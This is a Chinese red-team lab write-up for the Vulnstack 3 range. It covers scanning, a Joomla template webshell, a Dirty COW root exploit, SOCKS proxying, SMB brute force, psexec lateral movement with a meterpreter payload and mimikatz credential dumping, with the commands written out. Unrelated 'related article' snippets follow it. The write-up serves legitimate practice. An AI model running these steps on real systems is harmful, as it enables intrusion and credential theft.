ATTCK实战系列-红队评估 (红日靶场3)Vulnstack三层网络域渗透靶场

news2024/11/24 5:38:31

文章目录

  • 环境配置
    • 靶场介绍
    • 靶场设置
  • 外网渗透
    • 信息收集
      • 端口扫描
      • 目录扫描
    • 漏洞发现与利用
      • 获取ssh账号密码,登录centos
    • 提权
  • 内网渗透
    • 建立代理
    • 内网信息收集
    • smb暴破,获取本地管理员密码
  • 横向移动
    • 使用psexec模块上线msf

环境配置

靶场介绍

靶场地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/5/

打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。

挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。

除重新获取ip,不建议进行任何虚拟机操作。

参考虚拟机网络配置,添加新的网络,该网络作为内部网络。

注:名称及网段必须符合下面图片,进行了固定ip配置。

靶场设置

网络配置要求,攻击机kali为net8,外网的centos其中一个为net8,另一个net2
在这里插入图片描述

拓扑图(这里我的kali为192.168.1.5)

在这里插入图片描述

外网渗透

信息收集

端口扫描

使用nmap进行端口,服务,操作系统探测

nmap -sS -P0 -sV -O 192.168.1.110

得到目标开放了22,80和3306
在这里插入图片描述
访问一下目标的80端口,看到是个joomla CMS搭建的网站,脚本语言为php
在这里插入图片描述

目录扫描

dirb http://192.168.1.110/

发现目标存在admin目录
在这里插入图片描述
访问一下是个后台的登录界面,弱口令进不去
在这里插入图片描述

漏洞发现与利用

使用msf获取joomla cms相关信息

use auxiliary/scanner/http/joomla_version
set rhosts http://192.168.1.110/
run

得到具体版本,没啥用,不能利用
在这里插入图片描述
上御剑,扫一下后台,发现一大堆东西
phpinfo()
在这里插入图片描述
mysql配置信息
在这里插入图片描述
navicat远程连接mysql,看到管理员密码被加密了
在这里插入图片描述
这里可以根据官方文档,修改添加管理员账号密码
如何恢复或重置管理员密码?

这里注意表的名字改成你自己的
在这里插入图片描述

登录后台

http://192.168.1.103/administrator/index.php  admin2  secret

getshell

点击
extensions-->templates-->templates-->protostar details and files-->index.php-->save

写入蚁剑shell
在这里插入图片描述
连接成功
在这里插入图片描述
命令执行发现用不了,php开启了禁用函数
在这里插入图片描述
使用蚁剑插件绕过函数禁用
在这里插入图片描述

获取ssh账号密码,登录centos

看下目录里面有没有有用的信息,发现一个账号密码,前期信息收集知道开放了22端口,远程连接试一下
在这里插入图片描述
连接成功
在这里插入图片描述

提权

uname -r 发现linux内核版本很低,可以用脏牛提权

https://github.com/imust6226/dirtcow

靶机里vi dirty.c,直接将上面dirty.c里的内容复制进去,编译一下

gcc -pthread dirty.c -o dirty -lcrypt

在这里插入图片描述

./dirty 123456  ---执行exp

创建账户:firefart,密码:123456

切换到firefart账户,获取root权限
在这里插入图片描述

内网渗透

建立代理

掏出祖传的EW(earthworm),上传到靶机并执行,让靶机当做进入内网的跳板
在这里插入图片描述
kali里记得修改一下走靶机地址

vim /etc/proxychains.conf  //配置proxychains

将最后一行的socks4注释掉,添加下面的行,端口为跳板机上的ew监听的8888:

socks5  192.168.1.100 8888

内网信息收集

直接上神器fscan

在这里插入图片描述

由此可以看出:

已经拿到root权限的centos:有两张网卡 一张是192.168.216.131 一张是192.168.93.100

Nginx代理服务器ubantu:192.168.93.120

一台非TEST域内win7专业版主机:192.168.93.30

一台TEST域内win2008主机:192.168.93.20

一台TEST域控主机win server 2012:192.168.93.10

还跑出来了疑似的SSH账号,尝试登录发现不正确,挂代理尝试登录

smb暴破,获取本地管理员密码

这里我的字典里没有这个密码,我手动加上去的,20,30都是这个密码

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.30
set smbuser administrator
set pass_file top10k.txt
run

暴破密码:administrator 123qwe!ASD
在这里插入图片描述

横向移动

使用psexec模块上线msf

use exploit/windows/smb/psexec
set rhost 192.168.93.30
set payload windows/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
run

拿下win7
在这里插入图片描述
拿下win2008
在这里插入图片描述
接下来通过msf上传mimikatz,进行密码读取

#提升权限
privilege::debug

抓取密码
lsadump::lsa /patch

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/825003.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

[LeetCode]链表相关题目(c语言实现)

文章目录 LeetCode203. 移除链表元素LeetCode237. 删除链表中的节点LeetCode206. 反转链表ⅠLeetCode92. 反转链表 II思路 1思路 2 LeetCode876. 链表的中间结点剑指 Offer 22. 链表中倒数第k个节点LeetCode21. 合并两个有序链表LeetCode86. 分隔链表LeetCode234. 回文链表Leet…

如何打造属于自己的个人IP?

在当今信息爆炸的时代,个人 IP 已经成为人们在网络世界中的独特标签。无论是在职场上、创业中,还是在社交生活中,拥有个人 IP 的人都能脱颖而出,吸引更多的关注和机会。那么,如何打造属于自己的个人 IP 呢?…

机器学习和深度学习简述

一、人工智能、机器学习、深度学习的关系 近些年人工智能、机器学习和深度学习的概念十分火热,但很多从业者却很难说清它们之间的关系,外行人更是雾里看花。概括来说,人工智能、机器学习和深度学习覆盖的技术范畴是逐层递减的,三…

华为OD机试真题 JavaScript 实现【名字的漂亮度】【牛客练习题】

目录 一、题目描述二、输入描述三、输出描述四、解题思路五、JavaScript算法源码 华为OD机试 2023B卷题库疯狂收录中,刷题点这里 刷的越多,抽中的概率越大,每一题都有详细的答题思路、详细的代码注释、样例测试,发现新题目&#x…

vue3实现拖拽排序

效果&#xff1a; 实现 <template><div class"box"><divv-for"(item, index) in items":key"item.id"class"item":style"{ order: item.order }":draggable"true"dragstart"onDragStart(in…

redis的安装和配置

一、nosql 二、redis的安装和配置 redis的安装&#xff1a; redis常见配置&#xff1a; 配置文件redis.conf

DP学习第五篇之礼物的最大价值

DP学习第五篇之礼物的最大价值 剑指 Offer 47. 礼物的最大价值 - 力扣&#xff08;LeetCode&#xff09; 一.题目解析 二. 算法原理 状态表示 tips: 经验题目要求。以[i,j]位置为结尾&#xff0c;。。。 dp[i][j]: 到达[i, j]位置时&#xff0c;此时的最大礼物价值 状态转移…

Java版工程行业管理系统源码-专业的工程管理软件- 工程项目各模块及其功能点清单 em

&#xfeff;Java版知识付费源码 Spring CloudSpring BootMybatisuniapp前后端分离实现知识付费平台 提供职业教育、企业培训、知识付费系统搭建服务。系统功能包含&#xff1a;录播课、直播课、题库、营销、公司组织架构、员工入职培训等。 提供私有化部署&#xff0c;免费售…

【css】css隐藏元素

display:none&#xff1a;可以隐藏元素。该元素将被隐藏&#xff0c;并且页面将显示为好像该元素不在其中。visibility:hidden&#xff1a; 可以隐藏元素。但是&#xff0c;该元素仍将占用与之前相同的空间。元素将被隐藏&#xff0c;但仍会影响布局。 代码&#xff1a; <!…

Maya中polygon和transform区别?

In Autodesk Maya, “polygon” and “transform” are two fundamental types of nodes used to represent different aspects of 3D geometry and the transformation of objects in the scene. Polygon (polyMesh): A polygon node, often referred to as a “polyMesh,” r…

Ubuntu开机自启服务systemd.service配置教程(Ubuntu服务)(Linux服务)upstart

文章目录 为什么要将程序配置成服务&#xff1f;1. 自动启动2. 后台运行3. 定时重启4. 简化管理5. 整合系统 版本支持1. Ubuntu 14.04及更早版本&#xff1a;使用upstart作为默认的init系统/etc/rc.local旧版本新版本 2. Ubuntu 15.04到16.04版本&#xff1a;默认使用systemd作…

CTFSHOW php 特性

web89 数组绕过正则 include("flag.php"); highlight_file(__FILE__);if(isset($_GET[num])){$num $_GET[num]; get numif(preg_match("/[0-9]/", $num)){ 是数字 就输出 nodie("no no no!");}if(intval($num)){ 如果是存在整数 输出 flagecho …

算法通关村第四关——如何基于数组(链表)实现栈

栈的基础知识 栈的特征 特征1 栈和队列是比较特殊的线性表&#xff0c;又被称为 访问受限的线性表。栈是很多表达式、符号等运算的基础&#xff0c;也是递归的底层实现&#xff08;递归就是方法自己调用自己&#xff0c;在JVM的虚拟机栈中&#xff0c;一个线程中的栈帧就是…

使用分布式数据库,还需要考虑做分库分表吗?

随着数据存储需求的不断增加&#xff0c;分布式数据库成为了处理大规模数据的一种重要方式。分布式数据库可以将数据分散到多个计算节点上&#xff0c;并利用分布式计算的能力来提高数据处理的效率和可用性。然而&#xff0c;在使用分布式数据库的过程中&#xff0c;是否需要进…

网络安全工具包NST发布38-13644版本

导读开源网络安全工具包NST近日发布了最新版本38-13644。该版本基于Fedora 38构建,使用Linux 6.3.12内核,主要针对软件的维护与功能增强进行了更新。 根据发布公告,新版本通过Docker容器方式重构了OpenVAS和Greenbone漏洞扫描组件,实现了完整的漏洞评估能力。另外,还增强了地理…

微信公众号程序PHP源码 收银台源码 商家PHP源码 微信支付扫码付款 商家收银台

商家收银台-微信支付扫码付款-微信支付收银台-PHP源码 微信公众号程序&#xff0c;必须微信认证服务号&#xff0c;微信支付商家 客户扫码&#xff0c;打开商家定义支付页面&#xff0c;输入金额和对应定义信息&#xff0c;提交微信支付&#xff0c;实现快速付款 支持创建多…

信息系统网络安全整改方案

第1章 项目概述 1.1 项目目标 本方案将通过对公司网络信息系统的安全现状进行分析工作&#xff0c;参照国家信息系统等级保护要求&#xff0c;找出信息系统与安全等级保护要求之间的差距&#xff0c;给出相应的整改意见&#xff0c;推动 XX 企业公司网络信息系统安全整改工作的…

将jar包打入本地maven仓库

1、准备好要入仓的jar包 2、在jar包所在文件夹打开cmd 3、输入如下命令进行打包 mvn install:install-file -DgroupIdcom.netty.common -DartifactIdnetty-common -Dversion1.0-SNAPSHOT -Dpackagingjar -Dfilenetty-common-1.0-SNAPSHOT.jar如下图所示&#xff1a;

TCP连接的状态详解以及故障排查(三)

TCP连接建立三次握手 TCP是一个面向连接的协议&#xff0c;所以在连接双方发送数据之前&#xff0c;都需要首先建立一条连接。 Client连接Server&#xff1a; 当Client端调用socket函数调用时&#xff0c;相当于Client端产生了一个处于Closed状态的套接字。 (1)第一次握手&a…

10.事件流

10.1事件流和两个阶段说明 ●事件流指的是事件完整执行过程中的流动路径 简单来说&#xff1a;捕获阶段是从父到子 冒泡阶段是从子到父 10.2事件捕获 事件捕获概念&#xff1a; 从DOM的根元素开始去执行对应的事件(从外到里) ●事件捕获需要写对应代码才能看到效果 ●代码:…